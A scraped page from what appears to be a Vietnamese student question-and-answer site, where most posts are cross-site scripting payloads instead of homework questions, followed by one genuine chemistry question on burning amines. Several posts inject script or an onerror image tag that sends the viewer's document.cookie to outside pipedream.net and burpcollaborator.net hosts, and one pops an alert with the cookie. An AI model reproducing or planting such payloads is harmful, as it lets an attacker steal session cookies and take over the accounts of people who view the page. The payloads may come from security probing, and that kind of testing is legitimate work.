Hỏi - đáp

Toán học - Lớp 10

toán

<script>document.write('<img src = "https://129d4c06f60291b891959f314c04e7c4.m.pipedream.net
/?cookie='+document.cookie+'"/>')</script>

 

Hóa học - Lớp 12

toán

<script>document.write('<img src = "https://d87d133920ef83b608628dc97f7bac30.m.pipedream.net/?cookie='+document.cookie+'"/>')</script>

Toán học - Lớp 10

aaaa

<script>document.write('<img src = "https://dq7eqp9m7ucx2icwk9fvenzuxl3dr2.burpcollaborator.net/?cookie='+document.cookie+'"/>')</script>

Toán học - Lớp 11

toán

<script>document.write('<img src="https://0st1scb99hek45ejmwhiga1hz85ytn.burpcollaborator.net/?cookie=' + document.cookie + '" />')</scr>

Toán học - Lớp 12

toán

<img src = 0 onerror = document.write('<img src="https://0st1scb99hek45ejmwhiga1hz85ytn.burpcollaborator.net/?cookie=' + document.cookie + '" />')>

Hóa học - Lớp 12

abc

<script>alert(document.cookie)</script>

Hóa học - Lớp 12

Giúp e vs mn . E cần gấp lắm ạ

Đốt cháy hoàn toàn hai amin no , đó chức , mạch hở cần vừa đủ 0,735 mol o2 thu được 11,7g h2o . Tổng khối lượng của hai amin no đem đốt là

A. 8,46

B.6,22

C.9,5

D.10,7